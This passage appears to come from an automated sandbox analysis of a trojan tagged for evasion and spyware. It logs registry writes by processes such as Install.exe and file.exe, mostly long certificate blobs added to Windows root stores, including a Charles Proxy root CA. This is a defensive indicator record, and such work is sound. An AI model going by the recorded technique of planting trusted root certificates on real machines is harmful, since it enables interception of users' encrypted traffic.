Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time"	F9D0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time"	F9D0.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs	file.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time"	F9D0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time"	F9D0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time"	F9D0.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	file.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies."	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time"	F9D0.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs	file.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time"	F9D0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time"	F9D0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time"	F9D0.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-e2-17-db-d2-77\WpadDecisionTime = 009e3ee63611d701	file.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time"	F9D0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time"	F9D0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time"	F9D0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time"	F9D0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time"	F9D0.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates	file.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0"	netsh.exe

Modifies system certificate store 2 TTPs 17 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	Install.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	7146042.78
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	file.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	file.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	Install.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 0f0000000100000020000000f58d226a1455ea81e8c8df37b8c942f342ebbc60a29701fc2895ec13140104610300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd2000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576	Install.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 140000000100000014000000f8d0dc54367cf794020f8b92783a5d8a91251f9f0300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd0f0000000100000020000000f58d226a1455ea81e8c8df37b8c942f342ebbc60a29701fc2895ec13140104612000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576	Install.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	D8F6.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	7146042.78
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	file.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d303430